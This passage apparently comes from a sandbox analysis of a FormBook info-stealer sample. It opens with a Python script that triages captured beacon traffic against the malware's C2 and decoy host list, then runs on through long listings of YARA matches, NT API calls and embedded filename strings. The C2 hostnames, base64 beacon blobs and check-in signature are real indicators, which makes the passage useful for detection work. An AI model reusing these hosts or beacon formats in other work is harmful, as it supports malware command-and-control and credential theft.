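    beacon("www.wwiilive.com", "2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw=="),
    beacon("www.play-to-escape.com", "wU8NyZPkNGRQQpssl8Iv49O+whrQvSeXFC/S+Kx28E86ZZkWNSugarjcLE+3raO3NGyltw=="),
    beacon("www.yhomggsmtdynchb.store", "vtjrYftuZe8iaBtQ/TWxrabmNpKe1jOOTYTB1/nX+Um4K24Q/B9FUBqnYP2A+q8J0+YELg=="),
]

B64 = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def norm_host(host):
    host = host.strip().lower()
    return host[4:] if host.startswith("www.") else host


def c2_table():
    """Map each 'C2 list' entry to {host without www: path}, e.g. {'wwiilive.com': '/u4an/'}."""
    table = {}
    for entry in CONFIG["C2 list"]:
        host, _, path = entry.partition("/")
        table[norm_host(host)] = "/" + path
    return table


def parse_request(raw):
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    # Split by hand: urllib.parse.parse_qs would turn the '+' inside the base64 blob into a space.
    params = [tuple(p.split("=", 1)) if "=" in p else (p, "") for p in query.split("&") if p]
    return {"method": method, "path": path, "params": params, "headers": headers}


def classify_host(host):
    """'c2' if the host is in the C2 list, 'decoy' if in the decoy list, else 'unknown'."""
    h = norm_host(host)
    if h in c2_table():
        return "c2"
    if h in {norm_host(d) for d in CONFIG["decoy"]}:
        return "decoy"
    return "unknown"


def looks_like_checkin(req):
    """Heuristic (assumption): GET to a configured C2 path, exactly two query
    parameters with a base64 blob first, Connection: close and no User-Agent."""
    if req["method"] != "GET" or req["path"] not in set(c2_table().values()):
        return False
    if len(req["params"]) != 2 or not B64.fullmatch(req["params"][0][1]):
        return False
    return (req["headers"].get("connection", "").lower() == "close"
            and "user-agent" not in req["headers"])


def triage(raw_requests):
    """(host, role, check-in shape?, value of the constant second parameter) per request."""
    rows = []
    for raw in raw_requests:
        req = parse_request(raw)
        host = req["headers"].get("host", "")
        second = req["params"][-1][1] if req["params"] else ""
        rows.append((host, classify_host(host), looks_like_checkin(req), second))
    return rows


if __name__ == "__main__":
    for host, role, shape, second in triage(OBSERVED):
        print(f"{host:28} {role:8} checkin={shape} an={second}")
```

On the captured traffic every request has the check-in shape and carries the same second parameter, but only the www.wwiilive.com row is labelled `c2`; the other six are decoys from the configuration, which is why blocking on destination alone over-counts infrastructure while matching the URI shape and missing User-Agent catches all seven.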

E-Banking Fraud:

Yara detected FormBook
Source: Yara match; file sources: the same unpacked PE (4.2.ejecutable2.exe.400000.0.unpack) and nine memory dumps listed under "Yara detected FormBook" in the AV Detection section above

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
.NET source code contains very large strings
Source: ejecutable2.exe, Darwin.WindowsForm/SearchResults.cs; Long String: Length: 34816
Source: CmsVPZkxbOtm.exe.0.dr, Darwin.WindowsForm/SearchResults.cs; Long String: Length: 34816
Source: 0.0.ejecutable2.exe.1120000.0.unpack, Darwin.WindowsForm/SearchResults.cs; Long String: Length: 34816
Source: 0.2.ejecutable2.exe.1120000.2.unpack, Darwin.WindowsForm/SearchResults.cs; Long String: Length: 34816
Source: 4.2.ejecutable2.exe.1120000.5.unpack, Darwin.WindowsForm/SearchResults.cs; Long String: Length: 34816
Source: ejecutable2.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_003300F0
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_003369C9
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_00336D30
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_0033E418
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_00339409
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_0033E685
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_0033CC98
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_00336D21
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_00338FD0
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_048C6B67
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_048C51CC
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_048C5F99
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00401030
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041BA85
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041C296
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041BBE0
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00408C6B
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00408C70
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041C40C
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041C4F7
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041C55C
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00402D90
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02441238
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0239E2E9
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023A2305
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023EA37B
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023A7353
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023C63DB
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0239F3CF
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023CD005
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023B905A
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023A3040
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0239E0C6
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02442622
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023A4680
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023AE6C1
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023AC7BC
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0242579A
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023D57C3
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023DD47D
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023B1489
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023D5485
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023A351F
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023BC5F0
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02453A83
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023C7B00
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0242DBDA
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0244CBA4
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0239FBD7
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023C286D
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023AC85C
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0243F8EE
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02425955
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023A29B2
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023B69FE
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0244098E
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023D2E2F
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023BEE4C
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023B0F3F
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023CDF7C
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023D0D3B
          Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 0239E2A8 appears 35 times
          Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 023E3F92 appears 88 times
          Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 023E373B appears 213 times
          Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 0239DF5C appears 106 times
          Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 0240F970 appears 75 times
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_004185D0 NtCreateFile,
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00418680 NtReadFile,
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00418700 NtClose,
          Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_004187B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023900C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023907AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02390078 NtResumeThread,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02390060 NtQuerySection,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02390048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023910D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0239010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02391148 NtOpenThread,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023901D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02391930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02390C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wscript.exe Process Stats: CPU usage > 98%
          Source: ejecutable2.exe, 00000000.00000002.424354114.00000000011E4000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUIntPtrTypeIn.exe4 vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.423754997.00000000004B0000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameColladaLoader.dll4 vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.424055969.00000000005BF000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamesctasks.exej% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.425701287.0000000004910000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameCF_Secretaria.dll< vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.423882102.0000000000514000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameCSRSS.Exe.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamewinsrv.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWinInit.exe.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWINLOGON.EXE.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameuser32j% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameservices.exe.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamelsasrv.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamesvchost.exe.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamewshtcpip.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamewship6.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamewshqos.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameAUTHUI.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenametzres.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamesppsvc.exe.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameInput.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameTipTsf.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSpTip.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameTableTextService.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamegpsvc.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameaero.msstyles.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenametaskcomp.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamespoolsv.exe.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBFE.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFirewallAPI.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenametaskhost.exe.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUSERINIT.EXE.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: originalfilename vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameMSCMS.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamej% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameMsCtfMonitor.DLL.MUIj% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamesnmptrap.exe.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamelmhsvc.dll.muij% vs ejecutable2.exe
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamedwm.exe.muij% vs ejecutable2.exe
